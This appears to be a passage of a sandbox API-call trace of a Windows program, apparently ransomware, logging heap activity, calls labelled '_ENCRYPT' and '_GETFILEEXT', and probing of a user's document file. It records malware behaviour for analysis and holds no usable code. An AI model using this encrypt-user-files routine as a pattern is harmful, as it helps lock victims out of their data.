dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.234] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.236] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0178.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0178.237] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0178.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.238] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.239] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0178.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0178.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.239] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0178.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0178.240] CloseHandle (hObject=0x120) returned 1 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0178.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0178.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.241] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.241] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0178.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.242] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0178.242] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.242] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0178.242] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.242] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0178.242] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0178.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.242] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.242] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.242] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.242] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.242] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.254] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.255] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.255] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4787dab0, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0x2d78f050, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0x2d78f050, ftLastWriteTime.dwHighDateTime=0x1d5e025, nFileSizeHigh=0x0, nFileSizeLow=0x9094, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="isuTz.pps", cAlternateFileName="")) returned 0x90add8 [0178.256] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.257] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4787dab0, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0x2d78f050, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0x2d78f050, ftLastWriteTime.dwHighDateTime=0x1d5e025, nFileSizeHigh=0x0, nFileSizeLow=0x9094, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="isuTz.pps", cAlternateFileName="")) returned 0x90add8 [0178.257] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.257] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 